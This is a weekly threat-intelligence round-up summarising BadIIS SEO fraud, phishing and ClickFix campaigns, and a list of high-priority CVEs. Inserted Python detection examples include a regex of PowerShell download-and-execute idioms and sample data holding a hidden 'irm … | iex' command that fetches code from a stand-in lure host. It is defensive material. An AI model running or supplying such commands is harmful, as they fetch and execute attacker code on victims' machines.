
Weekly Cyber Round-up

Intelligence Report

February 13, 2025

Chinese-speaking threat actor manipulates SEO with BadIIS

In 2024, Trend Micro researchers observed the mass distribution of BadIIS in Asia as part of a search engine optimisation (SEO) fraud campaign targeting Microsoft Internet Information Services (IIS). The most impacted countries include India, Thailand, and Vietnam, among others. The targeted IIS servers belong to government bodies, universities, technology companies, and telecommunications providers. In the observed campaign, threat actors exploit vulnerable IIS servers and install the BadIIS malware on the compromised hosts. BadIIS can alter the HTTP response headers returned by the web server and inject JavaScript that redirects visitors to malicious sites. Most of the observed variants redirect users to illegal gambling websites, though the researchers warned that the same method could be adapted to redirect users to servers that host malware or phishing pages.
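As an added defender-side example (not code from the Trend Micro report or from this round-up), the following Python check compares a fresh capture of one of your own IIS pages against a known-good baseline and flags the kinds of additions described above: an off-site Location header, a new external script, an inline JavaScript redirect or a new meta refresh. The site name, the sample captures and the regexes are constructed assumptions, not indicators from the report.

```python
import re
from urllib.parse import urlparse

# Patterns for the elements a response-injecting IIS module typically adds (heuristic, assumed).
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
META_REFRESH_RE = re.compile(r'<meta[^>]+http-equiv\s*=\s*["\']refresh["\'][^>]*>', re.I)
REDIRECT_JS_RE = re.compile(r"\blocation\b(\.(href|replace|assign))?\s*[=(]", re.I)

def _scripts(html):
    """Return (kind, value) pairs: ('src', url) or ('inline', code) for every script tag."""
    found = []
    for attrs, body in SCRIPT_RE.findall(html):
        m = SRC_RE.search(attrs)
        found.append(("src", m.group(1)) if m else ("inline", " ".join(body.split())))
    return found

def find_injected_redirects(baseline, observed, site_host):
    """Compare a known-good capture with a fresh one and list redirect-style additions.
    Captures are dicts with 'status', 'headers' and 'body' (from a periodic fetch of your own pages)."""
    findings = []
    loc = observed["headers"].get("Location", "")
    if 300 <= observed["status"] < 400 and loc and urlparse(loc).hostname not in (None, site_host):
        findings.append(f"off-site Location header: {loc}")
    known = set(_scripts(baseline["body"]))
    for kind, value in _scripts(observed["body"]):
        if (kind, value) in known:
            continue  # script was already present in the known-good page
        if kind == "src" and urlparse(value).hostname not in (None, site_host):
            findings.append(f"new external script: {value}")
        elif kind == "inline" and REDIRECT_JS_RE.search(value):
            findings.append(f"new inline redirect: {value[:60]}")
    for tag in META_REFRESH_RE.findall(observed["body"]):
        if tag not in baseline["body"]:
            findings.append(f"new meta refresh: {tag}")
    return findings

# Constructed sample captures for illustration; not real responses or real indicators.
SITE = "www.example-university.test"
CLEAN = {"status": 200, "headers": {"Server": "Microsoft-IIS/10.0"},
         "body": "<html><head><script src='/static/app.js'></script>"
                 "<script>console.log('ok')</script></head><body>Hi</body></html>"}
INJECTED = {"status": 200, "headers": {"Server": "Microsoft-IIS/10.0"},
            "body": CLEAN["body"].replace("</body>",
                    "<script>window.location.href='https://bet-lure.test/'</script>"
                    "<script src='https://cdn.bet-lure.test/seo.js'></script></body>")}
```

Because SEO-fraud modules often serve different content to crawlers and to humans, fetch the page with a normal browser User-Agent and with a search-engine crawler User-Agent and run the check on both captures.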


Facebook phishing campaign uses copyright infringement to harvest information

Check Point researchers identified a phishing campaign that impersonates Facebook to harvest credentials. The campaign began in December 2024 and has since been sent to more than 12,279 email addresses across hundreds of companies in Europe, the United States, and Australia. Versions of the notifications were also found in Chinese and Arabic. The actors leverage Salesforce’s automated mailing service, without changing the sender ID, so the emails arrive from the legitimate Salesforce ‘noreply’ address. The emails use fake versions of the Facebook logo and claim the recipient has violated copyright laws. A link leads to a fake Facebook support page where victims are prompted to enter their credentials.

Large-scale brute force attack campaign targets edge security devices

The Shadowserver Foundation warned of a large-scale brute force attack using around 2.8 million IP addresses that has been active since at least January 2025. The campaign is targeting credentials for a wide range of networking devices, including ones from Palo Alto Networks, Ivanti, and SonicWall. The majority of IP addresses, 1.1 million, are in Brazil, with large numbers also coming from Turkey, Russia, Argentina, Morocco, and Mexico. The attacking IP addresses are spread across many networks and Autonomous Systems, and are likely part of a botnet or an operation associated with residential proxy networks. The attacks are mainly launched from MikroTik, Huawei, Cisco, Boa, and ZTE routers and other Internet of Things devices.

DeepSeek ClickFix campaign delivers Vidar and Lumma Stealer

CloudSEK researchers observed threat actors exploiting DeepSeek’s brand name to launch phishing campaigns that deliver infostealer malware such as Vidar Stealer and Lumma Stealer. The campaigns use investment scheme lures and leverage the ClickFix technique. One such campaign involves a fake DeepSeek site advertising a supposed partnership programme. Clicking the ‘Verificate’ button opens a fake CAPTCHA prompt that silently copies a malicious PowerShell command to the clipboard, which the user is then instructed to paste into the Windows Run dialog. The fake domain used in the campaign was hosted behind Cloudflare to evade detection by artificial intelligence-based search engines.
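The ClickFix chain above ends with the victim pasting a command into the Run dialog, so on the endpoint it shows up as powershell.exe (or another interpreter) spawned by explorer.exe, and forensically as an entry under the user's RunMRU registry key. The Python below is an added example, not code from CloudSEK or from this round-up: it runs that detection logic over constructed process-creation events and a constructed RunMRU export; the suspicious-argument list and the lure domain are assumptions.

```python
import re

# Interpreters a ClickFix lure typically tells the victim to paste into Run (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Switches and download-and-execute idioms common in clipboard one-liners (heuristic, assumed).
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-nop\b|"
    r"invoke-webrequest|\b(iwr|irm|iex)\b|invoke-expression|downloadstring|\bmshta\b",
    re.I,
)

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def is_run_dialog_launch(event):
    """True when an interpreter was started by explorer.exe, the parent of anything typed into Win+R."""
    return _basename(event["Image"]) in INTERPRETERS and _basename(event["ParentImage"]) == "explorer.exe"

def detect_clickfix(events):
    """Return process-creation events that match the ClickFix pattern."""
    return [ev for ev in events if is_run_dialog_launch(ev) and SUSPICIOUS_ARGS.search(ev["CommandLine"])]

def suspicious_runmru(values):
    """Values under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU hold what the
    user typed into Run, each stored as 'command\\1'. Return entries that look like ClickFix one-liners."""
    hits = []
    for name, data in values.items():
        if name == "MRUList":  # ordering value, not a command
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        if SUSPICIOUS_ARGS.search(cmd):
            hits.append(cmd)
    return hits

# Constructed sample events using Sysmon Event ID 1 / Windows 4688 field names; not real telemetry.
EVENTS = [
    {"Image": r"C:\Windows\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\notepad.exe" C:\notes.txt'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",  # scheduled task, not the Run dialog
     "CommandLine": r"powershell.exe -w hidden -File C:\ProgramData\patch.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://lure-site.test/v | iex"'},
]
RUNMRU = {"MRUList": "ba", "a": "notepad\\1",
          "b": 'powershell -w hidden -c "irm https://lure-site.test/v | iex"\\1'}
```

A scheduled task or logon script that starts PowerShell hidden (second event) is deliberately not flagged, since its parent is not explorer.exe; tune INTERPRETERS and SUSPICIOUS_ARGS to your environment.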

Phishing campaign targets travelers with arrival card lure to steal data

Cofense researchers detailed an ongoing phishing campaign that has been targeting travelers to Singapore since at least September 2023. The campaign is highly targeted and has since expanded to also target travelers to Malaysia and the UK. The phishing emails claim that more information is required as part of an immigration arrival card application. The emails redirect to a phishing page impersonating the website of Singapore’s official Immigration & Checkpoints Authority. Users are then asked to provide sensitive information, such as credit card details, to pay a supposed processing fee. Parts of the fake portal are pre-filled with the victim’s personally identifiable information to make it appear more legitimate.

High Priority Vulnerabilities

Name             Software                  Base Score  Temp Score
CVE-2025-24200   iPadOS                    4.6         3.8
  Related: Apple fixes zero-day exploited in ‘extremely sophisticated’ attacks
CVE-2025-21418   Windows                   7.8         7.5
  Related: Microsoft February 2025 Patch Tuesday fixes 4 zero-days, 55 flaws
CVE-2025-0994    Cityworks                 8.8         6.9
  Related: CISA Warns of Active Exploitation in Trimble Cityworks Vulnerability Leading to IIS RCE
CVE-2023-49103   graphapi                  10.0        5.1
  Related: ThinkPHP and ownCloud flaws actively exploited
CVE-2025-0282    Neurons for ZTA gateways  9.0         7.7
  Related: Hackers Exploiting Ivanti Connect Secure RCE Vulnerability to Install SPAWNCHIMERA Malware

Silobreaker Weekly Cyber Round-up